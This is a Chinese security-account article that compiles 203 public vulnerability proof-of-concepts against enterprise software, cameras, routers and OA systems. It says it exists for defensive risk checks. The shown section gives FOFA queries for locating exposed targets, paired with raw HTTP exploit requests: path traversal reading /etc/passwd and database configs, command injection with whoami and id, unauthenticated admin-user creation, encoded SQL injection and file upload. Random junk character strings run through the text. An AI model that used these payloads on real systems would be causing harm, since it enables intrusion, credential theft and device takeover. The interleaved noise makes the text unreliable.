互联网公开漏洞整理202309-202406: i8 ]. ^9 v! m1 ]" G+ E/ j$ o! j
道一安全 2024-06-05 07:41 北京
2 C" b0 {3 A; O6 y9 m以下文章来源于网络安全新视界 ,作者网络安全新视界
, z& B+ K2 W+ m. m: E( _8 M+ H# y, T1 h) C: X
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
( y7 Y7 y" ^' Y
( i" `+ @# v7 c漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。4 q) @! U' S8 v. ]4 E7 f
4 J$ Z F7 I/ F6 J" B# Z安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。4 P s& B( C! s! |" U5 T( W
# {9 Q5 z4 [6 H* v: r+ I3 l8 b( ~文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。/ d9 E0 b, x& ]7 I
8 A: [$ w: y) ~' Q8 Q+ q' f
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
; f8 T, o! k! T6 u/ b, W* k# O
! J( S: s5 r$ P- g' h9 x+ ]3 d- y6 ^# F/ l6 B, ^, N
声明+ x' I0 |4 [! s, ?; U5 D9 D1 w) [' b
' Y" X3 j+ p" K4 x$ ]) Y
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
: V4 O3 d* F$ A5 [% s
( E* M* g5 e, Q5 N, d有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。4 o! R9 x5 F% \! O$ {1 y4 _
! W6 W ? e# |
# I: p4 e9 T: }, \( w, P
% B8 N( Q6 h- L9 W& C
目录& `9 ?9 b. V% Q F: r0 U8 R
9 i0 h8 \( v5 l# D4 A015 v/ \0 }4 m5 R/ `3 P2 g& A6 c" I
/ S" e1 a/ a6 ~# ~1. StarRocks MPP数据库未授权访问
% F# ]. Q, Z V0 C: C5 E2. Casdoor系统static任意文件读取
3 M8 E7 |3 f) P& F3. EasyCVR智能边缘网关 userlist 信息泄漏, C2 x; W3 p. R$ q6 O% P
4. EasyCVR视频管理平台存在任意用户添加
" v. \1 g% E% b& V7 h8 f4 @5. NUUO NVR 视频存储管理设备远程命令执行' S+ g A3 Z+ H7 {. V G( V- j1 D
6. 深信服 NGAF 任意文件读取$ F* n) M% P% K3 `# B
7. 鸿运主动安全监控云平台任意文件下载" G' Q& ~& {5 L- ~( b7 {
8. 斐讯 Phicomm 路由器RCE3 J* c$ r# h O& g8 |; P" H$ x& @
9. 稻壳CMS keyword 未授权SQL注入2 Q! B4 L- j$ z- z; Q& I: |3 i
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传. S1 q6 @. W( y& J% {9 x0 y, ?, c! p
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入2 n( k* D" t2 M* T* U+ }0 C& s
12. Jorani < 1.0.2 远程命令执行
' [. |4 N- b1 \, r* [" Q/ J13. 红帆iOffice ioFileDown任意文件读取% C4 @; i* c) j
14. 华夏ERP(jshERP)敏感信息泄露1 J7 u7 f0 A' [) V7 j8 d6 U
15. 华夏ERP getAllList信息泄露" m( Q/ s, G e7 ?/ n
16. 红帆HFOffice医微云SQL注入; l% u$ m9 ?0 s, y8 s
17. 大华 DSS itcBulletin SQL 注入
) U/ ^5 U% H* d18. 大华 DSS 数字监控系统 user_edit.action 信息泄露( O6 @! |4 m) T/ U& }0 P p) C
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
. q! P8 B$ }. P8 _" x, p20. 大华ICC智能物联综合管理平台任意文件读取
* `# O S0 K0 c/ q3 q" N9 q2 t21. 大华ICC智能物联综合管理平台random远程代码执行0 U9 ~! g/ p2 {& y5 S) O
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
- y, v% u2 b; N# T23. 大华ICC智能物联综合管理平台 fastjson远程代码执行* v3 `- a! l3 `. y9 |' @5 e, x1 t
24. 用友NC 6.5 accept.jsp任意文件上传5 B3 h: O3 n( ~0 n
25. 用友NC registerServlet JNDI 远程代码执行. s: o h) w3 }! x$ d0 ]1 O
26. 用友NC linkVoucher SQL注入# @! z# ]+ m- L- ]. P! h% P$ h9 b
27. 用友 NC showcontent SQL注入1 D. P* X' s$ O7 Z
28. 用友NC grouptemplet 任意文件上传
5 M _4 F) a q: l29. 用友NC down/bill SQL注入
% [7 [7 m6 a. n30. 用友NC importPml SQL注入+ r# w6 M/ n f- I
31. 用友NC runStateServlet SQL注入
4 b; H! `. }, T1 Z: X) b) X32. 用友NC complainbilldetail SQL注入5 L3 q; L: R! p* P; E% G R7 H" [
33. 用友NC downTax/download SQL注入
) M p2 @( O4 @3 u+ h4 ]4 W34. 用友NC warningDetailInfo接口SQL注入; o6 @1 P/ J) |+ C. M2 g
35. 用友NC-Cloud importhttpscer任意文件上传1 @* B5 ~9 w, ?7 {( x- S" g6 Z) Q
36. 用友NC-Cloud soapFormat XXE" M9 }1 W5 C1 `/ @, k, ~: u0 T
37. 用友NC-Cloud IUpdateService XXE
4 l: o! m) _+ c+ t; M& f38. 用友U8 Cloud smartweb2.RPC.d XXE, p' V/ N( b9 M# g6 Q6 y# p
39. 用友U8 Cloud RegisterServlet SQL注入
: @$ v2 P# z$ h& m- Q3 A40. 用友U8-Cloud XChangeServlet XXE
; B- u' _8 [( F. N4 W$ O41. 用友U8 Cloud MeasureQueryByToolAction SQL注入2 `. P+ S% [+ H& ^
42. 用友GRP-U8 SmartUpload01 文件上传
! e* y. r% f4 T0 @5 H, g43. 用友GRP-U8 userInfoWeb SQL注入致RCE
* @ e/ O m, Q4 W# h5 [, j44. 用友GRP-U8 bx_dj_check.jsp SQL注入5 d0 h B, O+ F( t- [
45. 用友GRP-U8 ufgovbank XXE
; m+ {9 z3 A) d. S) F46. 用友GRP-U8 sqcxIndex.jsp SQL注入& x* d D; Z6 v/ a6 Q7 Q
47. 用友GRP A++Cloud 政府财务云 任意文件读取8 @7 J" S. \7 H5 ^; H6 A' b$ O
48. 用友U8 CRM swfupload 任意文件上传" s+ s [2 W! C! {) {
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
?% T8 ^) X4 R* N: Z5 t/ \50. QDocs Smart School 6.4.1 filterRecords SQL注入
' g c* \* b1 n0 Q51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
4 Y+ E9 m" ^* E& \! h52. 泛微E-Office json_common.php sql注入
" q& j. ?- _! f7 }4 M& H53. 迪普 DPTech VPN Service 任意文件上传2 j5 k6 T$ a* y9 z- Z
54. 畅捷通T+ getstorewarehousebystore 远程代码执行9 t" a* ]. o& B9 }# K5 E! O( ?
55. 畅捷通T+ getdecallusers信息泄露* o2 g) ~; _! J* n6 [/ o/ K
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
- M& u% P2 ^ M3 @& T" p57. 畅捷通T+ keyEdit.aspx SQL注入
/ L) t. y6 j6 K4 i3 D58. 畅捷通T+ KeyInfoList.aspx sql注入# K7 H8 K5 k6 \
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
+ u2 j# M' E0 G6 Y. m4 ~60. 百卓Smart管理平台 importexport.php SQL注入
9 n7 b( p3 k+ s- l4 A M+ z61. 浙大恩特客户资源管理系统 fileupload 任意文件上传! b' q& f X- D9 j
62. IP-guard WebServer 远程命令执行
, [* I* m/ D2 e% Z: c7 t63. IP-guard WebServer任意文件读取5 C% n! N7 v, o) \: u. Y
64. 捷诚管理信息系统CWSFinanceCommon SQL注入% P4 Q4 j0 Y- Q! ~$ Q7 a% j
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过9 w6 H; q$ f8 u: Q S
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入1 L$ P _) z8 s @" B
67. 万户ezOFFICE wpsservlet任意文件上传
% D; [( W" V! \3 @- K' K/ w68. 万户ezOFFICE wf_printnum.jsp SQL注入4 H! ]3 x* M3 O" z
69. 万户 ezOFFICE contract_gd.jsp SQL注入" Y+ J$ @( H! B( X
70. 万户ezEIP success 命令执行& j9 A6 G6 ]* _
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
, R! @4 V4 W+ a0 X: E5 V1 C72. 致远OA getAjaxDataServlet XXE
4 ]% }: d: r+ C73. GeoServer wms远程代码执行
, X+ A, \1 N5 Z( ~: _7 q5 ?4 ^74. 致远M3-server 6_1sp1 反序列化RCE
6 ~; O7 Z' r' |" \75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
0 X) ?7 K/ k/ c76. 新开普掌上校园服务管理平台service.action远程命令执行, U/ c+ t6 v3 ?+ u* b
77. F22服装管理软件系统UploadHandler.ashx任意文件上传# |1 U4 D9 w+ O/ o
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
# e1 n5 I7 A* t; O( L) A79. BYTEVALUE 百为流控路由器远程命令执行8 t& q4 q; ]/ @3 t8 H1 Y) a: f
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
5 z) ? P* d3 L7 V. q6 M/ V. b81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露. a7 s5 J5 h0 F% z
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行8 _1 S7 l" g( p. X7 k: | W' W
83. JeecgBoot testConnection 远程命令执行
/ f! R' [' ~& r84. Jeecg-Boot JimuReport queryFieldBySql 模板注入) U2 s1 U% H6 J6 f' ]
85. SysAid On-premise< 23.3.36远程代码执行
% n& s: I9 ~: x" B86. 日本tosei自助洗衣机RCE2 t7 ]# g2 {) j' E7 t( @" z4 i
87. 安恒明御安全网关aaa_local_web_preview文件上传
8 I6 z' G4 K4 {0 w88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
+ Q: r$ _5 g% p# D- `89. 致远互联FE协作办公平台editflow_manager存在sql注入: i' h- ?' b/ v+ F; F
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行& b9 b6 o- o5 s/ Y
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取+ Z9 S; K+ g8 ` \) J. F0 L8 ]
92. 海康威视运行管理中心session命令执行
1 H, z. c V% g+ I& T3 b$ }3 J93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
0 r8 @0 A; ~" d [1 L! J$ c94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
& t& J: l- u* ]$ N6 h4 d2 ] _95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
, K- E: S' N/ t0 `/ G96. Apache OFBiz 18.12.11 groovy 远程代码执行3 [& r" n- t- o, }# Y. w2 j. }- r
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
; ~6 O0 ?6 `; R2 `, g+ M# M& T. ?* L98. SpiderFlow爬虫平台远程命令执行# z1 t/ e9 N+ g) J8 d z! B
99. Ncast盈可视高清智能录播系统busiFacade RCE
/ y! f+ a8 f' M+ s100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
4 R5 H8 y- \$ \; l: e5 w J101. ivanti policy secure-22.6命令注入
$ l( b- f' z% n* A7 a102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
4 d! H* s+ U. J6 b9 j103. Ivanti Pulse Connect Secure VPN XXE$ @ _. S7 |+ h% s
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露2 M. T* s/ S& U R; C' V
105. SpringBlade v3.2.0 export-user SQL 注入
; U* x* a9 P9 d% r7 w106. SpringBlade dict-biz/list SQL 注入5 }5 _3 @" n% ?7 i6 d% v
107. SpringBlade tenant/list SQL 注入
& i$ J- V+ j: f108. D-Tale 3.9.0 SSRF
" |* r3 f4 n2 a109. Jenkins CLI 任意文件读取
; I6 m4 K% z& J9 C: f7 [110. Goanywhere MFT 未授权创建管理员) |% t/ X; b0 `+ o! x; Z
111. WordPress Plugin HTML5 Video Player SQL注入
5 v4 O7 i+ W' e/ Y4 {/ v112. WordPress Plugin NotificationX SQL 注入! K! j1 E3 A7 @$ A; i* M: _4 J
113. WordPress Automatic 插件任意文件下载和SSRF/ ^) W. a. N! [+ f( ^
114. WordPress MasterStudy LMS插件 SQL注入. I, b6 e9 N* a5 N4 m
115. WordPress Bricks Builder <= 1.9.6 RCE+ e3 {9 G5 ~# w6 \
116. wordpress js-support-ticket文件上传+ }$ G! a7 d, x- ]+ y5 l
117. WordPress LayerSlider插件SQL注入
% L o' ], e% S' j$ q5 x1 R118. 北京百绰智能S210管理平台uploadfile.php任意文件上传& a5 y& `- I1 K
119. 北京百绰智能S20后台sysmanageajax.php sql注入1 v9 j$ k& n+ j- l+ g
120. 北京百绰智能S40管理平台导入web.php任意文件上传
8 e6 N4 \2 J1 f1 q. q7 d0 e121. 北京百绰智能S42管理平台userattestation.php任意文件上传* [: O) j# C: n* n5 J# t
122. 北京百绰智能s200管理平台/importexport.php sql注入
8 K2 } S/ Y, [4 I( r123. Atlassian Confluence 模板注入代码执行
+ D ?5 g- p0 K6 f9 }0 G' V c3 V' h124. 湖南建研工程质量检测系统任意文件上传
9 v0 m3 p1 A. ^7 K! G. q125. ConnectWise ScreenConnect身份验证绕过9 d. s5 O" }8 Y& n
126. Aiohttp 路径遍历
" ^5 R8 S- V2 ]8 _# ^' i127. 广联达Linkworks DataExchange.ashx XXE# }* H1 a \1 [7 ?
128. Adobe ColdFusion 反序列化7 S$ \5 A( D# `: z# s4 @2 @% |1 [
129. Adobe ColdFusion 任意文件读取
" D& U; Y, Q4 O+ Q) Q130. Laykefu客服系统任意文件上传+ y9 f& K. ~/ Z
131. Mini-Tmall <=20231017 SQL注入
' |, \2 k2 `) Y$ g8 N8 Y8 t132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
) B$ P; ~9 U% K- O/ P h133. H5 云商城 file.php 文件上传
! @- d2 s4 h+ \8 W' o134. 网康NS-ASG应用安全网关index.php sql注入
7 N% n4 T P: N2 A& e' `/ K135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入- g, X7 q$ Z# {+ F
136. NextChat cors SSRF
9 \4 X! @7 b2 F9 G4 a9 C137. 福建科立迅通信指挥调度平台down_file.php sql注入
% \ c' M! i: G0 ]7 }138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
# w( q* d, b h) a' U0 r139. 福建科立讯通信指挥调度平台editemedia.php sql注入
6 Y A8 }! J- j( G. o140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
4 {" [* H. g- c2 S141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
% ~3 r' \' _/ F7 ~4 b142. CMSV6车辆监控平台系统中存在弱密码
' n9 F O( e' G" ]) e143. Netis WF2780 v2.1.40144 远程命令执行! g/ r( V ?9 c# y0 O* Q
144. D-Link nas_sharing.cgi 命令注入
6 p& W; e8 \# `1 o4 u+ r& J145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
3 B. z( c& J3 Z* K& i9 d# @- @146. MajorDoMo thumb.php 未授权远程代码执行
7 j! \ e+ \# J- ^: K147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
4 v: B: H$ H ~1 H8 M& I148. CrushFTP 认证绕过模板注入- N: w8 [2 `6 ~% K4 b- H
149. AJ-Report开源数据大屏存在远程命令执行7 U% }9 q( _% ]2 K! a8 {0 x
150. AJ-Report 1.4.0 认证绕过与远程代码执行
B( b& V! }0 Z6 N151. AJ-Report 1.4.1 pageList sql注入# A% }4 P6 F( d7 X! S$ a
152. Progress Kemp LoadMaster 远程命令执行
; l2 F/ ]3 Z; h" _# Y2 `153. gradio任意文件读取# L7 O) S! f) J; X$ ^$ H
154. 天维尔消防救援作战调度平台 SQL注入, O: G, K( O' i1 L) F# F
155. 六零导航页 file.php 任意文件上传+ x- q3 l% k2 _! d8 b8 S
156. TBK DVR-4104/DVR-4216 操作系统命令注入
# f7 \& W) \3 [157. 美特CRM upload.jsp 任意文件上传
' @5 b" d9 {$ V" p/ Y158. Mura-CMS-processAsyncObject存在SQL注入
! t+ l, p$ e' s& a159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传' b9 g4 u8 g" I H' P
160. Sonatype Nexus Repository 3目录遍历与文件读取% K9 ~# H* s+ b+ V# s3 Y; }9 s
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
: I9 u( L/ r2 `' h' J3 ]162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传/ M7 H! V6 U; ~; O6 S, i
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传) C' a, f+ g5 B2 l S# H% R9 Y
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
5 F4 d8 T, V! d n, ^165. OrangeHRM 3.3.3 SQL 注入/ @% ?2 L9 b' {
166. 中成科信票务管理平台SeatMapHandler SQL注入* K' B' T2 ^/ L) k
167. 精益价值管理系统 DownLoad.aspx任意文件读取
6 c5 k' b8 O2 V168. 宏景EHR OutputCode 任意文件读取3 i% E/ _+ z- E" L
169. 宏景EHR downlawbase SQL注入
9 `7 M! L9 H; g/ ~3 _170. 宏景EHR DisplayExcelCustomReport 任意文件读取3 W: C# s+ t: X' T
171. 通天星CMSV6车载定位监控平台 SQL注入
4 r$ u$ p! _) P; F$ a. L/ ^172. DT-高清车牌识别摄像机任意文件读取
$ `- d0 V' }6 L$ ?173. Check Point 安全网关任意文件读取+ ?4 E$ Z; Y- T1 `
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
. b4 n r1 G- L8 y175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入9 G) U5 A! K% }8 X
176. 电信网关配置管理系统 rewrite.php 文件上传2 k3 j, i7 P- }8 Q$ z
177. H3C路由器敏感信息泄露
" h) w/ O1 @' K178. H3C校园网自助服务系统-flexfileupload-任意文件上传
, t4 T/ t0 V* e2 w' w! P- v1 _ s179. 建文工程管理系统存在任意文件读取! U) c) ^( N9 x" E8 F
180. 帮管客 CRM jiliyu SQL注入, g8 M; B8 Z& N1 d; h
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入& V& E( G+ T" }( E$ O' I( f
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建" N" D; S+ K7 f1 C5 v+ K
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
+ G, o7 Y/ q$ h( n; J5 [. Z184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
& w6 v) b/ N, U+ m, f# l" @185. 瑞友天翼应用虚拟化系统SQL注入
: H% E1 t" U$ W }8 K0 t186. F-logic DataCube3 SQL注入4 F" l9 W' W8 j; m( i- ~
187. Mura CMS processAsyncObject SQL注入
9 V- X3 l4 k8 `6 U, O: Y/ M t ~188. 叁体-佳会视频会议 attachment 任意文件读取( ]( K8 v( n, \1 X O L" ?
189. 蓝网科技临床浏览系统 deleteStudy SQL注入9 f9 J7 C1 J( \% [; ^ O
190. 短视频矩阵营销系统 poihuoqu 任意文件读取 L9 S( V* ^* d- o
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入7 R4 e7 m$ Q: o4 \
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传8 K5 n$ z- G% U; e7 P4 ~7 |( N
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
2 e* Q) g: c9 J4 F, n9 \( M+ r194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传3 ^( G, a* G* Z# V% k9 O5 D: ]
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行" l6 \: R8 u3 l. s4 x+ e9 n
196. 河南省风速科技统一认证平台密码重置+ |& B4 [) c( A, m" S
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入2 V. g" S2 ^5 ~- B# ]; z
198. 阿里云盘 WebDAV 命令注入/ ?8 R f/ D' h" z m9 K
199. cockpit系统assetsmanager_upload接口 文件上传/ U }6 ?( O" w( o7 N( O" H& _. t
200. SeaCMS海洋影视管理系统dmku SQL注入
5 E" ?6 C$ ?4 F8 g201. 方正全媒体新闻采编系统 binary SQL注入
& u0 G0 q2 Z: ]* \8 Y202. 微擎系统 AccountEdit任意文件上传4 {% j, m3 V$ P; K; Q. I8 }( ]9 A
203. 红海云EHR PtFjk 文件上传3 ]$ l$ v, L3 f N" s
6 F1 u% {! k+ p3 a& uPOC列表' n$ Y& _, n( j! U- B% m% Z& B; D
- h7 S- X+ R; H$ X. c$ f) ^8 x+ H02; e; Q) ?( N2 _5 l- {. e2 T
3 l* E8 ^2 X- y9 H& J) z1. StarRocks MPP数据库未授权访问; e/ g; M7 e) Z& z t- }
FOFA :title="StarRocks"
3 @! V, k. P' C7 f) Q3 c* YGET /mem_tracker HTTP/1.1
' ?3 p- n" w4 x. dHost: URL, h; V4 h9 G- o& B, _( C' `7 Z+ V7 o
0 A. P- h( y, _) G6 x" Y: i* N/ N. H- Y2 s
2 S$ l z Z* W: Z) `
2. Casdoor系统static任意文件读取5 W2 d) X8 O, U3 Z8 j' [- _( P* Y
FOFA :title="Casdoor"0 E/ A9 J+ W5 {, s8 x, I
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
5 c" Y$ C( ?: [( VHost: xx.xx.xx.xx:9999
/ H2 x: B4 Y3 u) JUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
/ M" D9 `. Z4 MConnection: close! \! F4 R5 l' g( I- C; B$ f3 z! G
Accept: */*
" o3 g T8 _" B9 u5 F. uAccept-Language: en4 o" a3 [5 N1 C
Accept-Encoding: gzip) ] X, o( h" K$ c' P! p
3 ]! A2 S/ ~3 G3 @ u W7 t+ `. m9 p2 [2 j
3. EasyCVR智能边缘网关 userlist 信息泄漏) B/ C; o, I, H9 |! {
FOFA :title="EasyCVR", N+ o0 {6 \5 o ^6 }) y
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
6 Z2 T* T @( d$ J, g. `3 Y) q: fHost: xx.xx.xx.xx# c$ G# G2 V; k5 p8 ]9 X
! f: g- g3 J6 r6 Y& A
( ?0 @; C) R9 u
4. EasyCVR视频管理平台存在任意用户添加) T5 }- `5 e& U" J) P7 L; W% ]
FOFA :title="EasyCVR"5 U6 h5 F: h5 C+ u
- A/ [5 p* n3 Z3 l/ n+ Q- `# npassword更改为自己的密码md5- H% ]- P, W# l- b; `
POST /api/v1/adduser HTTP/1.15 T, ]5 z/ b( V; [3 [& \1 A
Host: your-ip
! D- G$ N5 D+ C5 M# m AContent-Type: application/x-www-form-urlencoded; charset=UTF-8, c, \1 T% S1 E8 C
" _& Q$ S4 r6 P$ ]% }2 q$ gname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1( c+ `4 A1 s2 u
7 a4 q; t. M% U+ C1 ^" ]: \0 x1 |. x$ ]+ ^+ K$ N$ B
5. NUUO NVR 视频存储管理设备远程命令执行+ v6 ~! C, M4 _* f; R
FOFA:title="Network Video Recorder Login"1 k6 E: l$ i I) Q6 H, E; }
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
: D( e8 c: n' }* S0 ~# |6 B& E6 ^$ nHost: xx.xx.xx.xx7 F C, L* s2 }6 b2 @" J
- L6 w) T7 L3 z- }6 s5 e6 l
2 k3 F# S- D; f/ g5 {, |$ V
6. 深信服 NGAF 任意文件读取. K3 T+ |0 e$ t5 T
FOFA:title="SANGFOR | NGAF"% C2 R) {8 e. W
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
* Q) Y. G3 Q4 G9 EHost:
8 G$ S5 v4 \* t$ z+ u9 F. U1 X& w2 {) B* `* w: m" R
6 X; n$ k6 V* q; |* @+ o" Z
7. 鸿运主动安全监控云平台任意文件下载
* V: A/ H7 H7 f8 U& G) g$ u5 CFOFA:body="./open/webApi.html"+ _' R0 p# D' q
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1! y2 z+ p m. K# Z( a3 f R
Host:
4 y4 J; }, u: C" r/ R: i$ Z% G8 [# K' Z- |7 |
/ V w6 L5 x7 A( [& o8. 斐讯 Phicomm 路由器RCE
9 l7 e+ ~3 E" I1 ]/ k# q P% J0 m+ lFOFA:icon_hash="-1344736688"5 _ Y: r! ~; E
默认账号admin登录后台后,执行操作/ l/ g' ?6 t: b* N# h
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1" ]5 d2 m7 H @2 h* @
Host: x.x.x.x
4 C! j% Q3 i* y' J% p3 FCookie: sysauth=第一步登录获取的cookie
/ _+ T. k T5 }Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
+ V/ `& T$ G& f+ l) }* z/ cUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36- c" j9 Z+ y" f; b* c# E
7 `( D( s2 E+ I0 m) U------WebKitFormBoundaryxbgjoytz% s/ B; n* t) u/ ~4 a
Content-Disposition: form-data; name="wifiRebootEnablestatus"# E& m4 J- w5 k0 F- `, P- k
8 Q( K0 Z7 U% `3 z%s
) \1 m! P5 n, W2 |. O4 v------WebKitFormBoundaryxbgjoytz
2 {; ?; S& c: B3 x* B3 b9 ZContent-Disposition: form-data; name="wifiRebootrange"2 p0 f* e& c, c' s
2 ` r$ y5 F0 ]- b12:00; id;2 L$ C, u- D9 j* k* ?( e" v
------WebKitFormBoundaryxbgjoytz
4 a% k& Q4 [% n/ y+ e# T g1 RContent-Disposition: form-data; name="wifiRebootendrange"
# M2 \4 m Z F! s
) P" Y7 T, V9 m3 P, N( j%s:
: J9 n( r, g* o; T- B------WebKitFormBoundaryxbgjoytz
: j/ Z O9 E0 K7 mContent-Disposition: form-data; name="cururl2"
/ \0 ~$ h( i; `) p2 E5 b& D3 _4 O
; o5 E& F' `) M8 n. D; `6 W------WebKitFormBoundaryxbgjoytz--
( G6 U3 R2 c9 l6 X4 g5 O) e4 M$ F9 f$ A0 x. I, c5 P
; }# l7 |: g! B/ k8 E1 a9 h
9. 稻壳CMS keyword 未授权SQL注入
* W: I' i9 [& v5 s" }, C( z# R5 nFOFA:app="Doccms": {: \ i6 P1 D% E6 y
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
% \0 H# k& X) O1 s9 J9 G- kHost: x.x.x.x
$ P) L0 h1 B' J( d* X& ], A% N4 H; ^" s3 Q# a
( L6 s. F8 V( k9 c
payload为下列语句的二次Url编码
3 ]4 H. D# |( ]& {! J! i( e, S1 ?0 T0 s' x8 a' H: l; Y A& {$ X
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
+ x- H3 D) A* h6 p7 p9 x2 c
2 F8 K5 B5 p1 |! S4 U* d7 q9 o10. 蓝凌EIS智慧协同平台api.aspx任意文件上传$ r1 \* p Q! J4 \- Q: F
FOFA:icon_hash="953405444"8 P: P/ x( h: p
0 Y/ A/ H% p* Q& P文件上传后响应中包含上传文件的路径* T# \- D+ Q( M; ~
POST /eis/service/api.aspx?action=saveImg HTTP/1.1( ?( Q6 e* l4 K c* o4 J! x& k
Host: x.x.x.x:xx* e- X2 h) }* f x" {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 [4 v3 U2 g- t3 \. z3 ~
Content-Length: 197
- D7 V& H/ H% ?% B/ AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ }+ ]6 x8 r) H. U2 iAccept-Encoding: gzip, deflate, c# F& i3 F" a5 b4 J- d
Accept-Language: zh-CN,zh;q=0.9: g# v: }: b$ Y$ G+ P" B* G
Connection: close4 F3 j' L2 Q3 Z3 k/ o/ @+ a
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
. L* }& b1 P+ B0 p) n( L* C8 X- Q; t( @3 q5 t* Y0 B* ]% o
------WebKitFormBoundaryxdgaqmqu3 o; B5 N! w; o) D1 w
Content-Disposition: form-data; name="file"filename="icfitnya.txt"0 P1 y5 ]4 v- i2 i
Content-Type: text/html
; a, b2 }/ u, y- M7 X
1 Q$ B4 B2 Z, bjmnqjfdsupxgfidopeixbgsxbf1 X9 X; e' T+ O1 d- {' k9 T) g& k
------WebKitFormBoundaryxdgaqmqu--# o7 R- ?- p0 [" u, p$ A O2 S6 L4 {+ m& j
) r" q3 X8 o2 B) ~4 y$ D9 ?) v0 r# T# U& u
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
: E+ S; r4 ~+ a9 k8 n3 ^; ]- x( X9 bFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
